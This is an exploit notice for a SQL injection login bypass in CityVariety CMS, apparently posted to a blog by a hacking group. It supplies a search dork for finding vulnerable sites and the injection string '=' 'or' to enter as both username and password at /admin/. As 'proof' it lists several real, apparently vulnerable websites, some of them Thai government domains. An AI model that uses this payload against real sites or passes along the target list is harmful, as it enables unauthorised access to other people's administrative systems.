*=============================================================|
|-------------------In The Name Of God------------------------|
|
| Exploit Title: CityVariety Cms ByPass Admin Page Vulnerability
|
| Exploit Author: Ashiyane Digital Security Team
|
| Vendor Homepage: http://www.cityvariety.co.th/
|
| Google Dork : intext:"Powered by CityVariety Corporation."
|
| Tested on: Windows 10 ~~~> Google Chrome
|
| Date: 2/2/2017
|==========================================================|
| Then Choose a Target and put this after URL : /admin/
|=========|
| And fill username and password like the information below :
|
| Username : '=' 'or'
|
| Password : '=' 'or'
|
*==========================================================|
| Proof :
|
| http://songkhlapao.go.th/admin/
|
| http://www.phuketcity.go.th/admin/
|
| http://www.songkhlatourism.org/admin/
|
| http://www.ye3330.com/admin/
|
| http://www.greenriverpanels.com/admin/
|
*============================================================|
| Discovered By : HackFans
*============================================================|
0 Komentar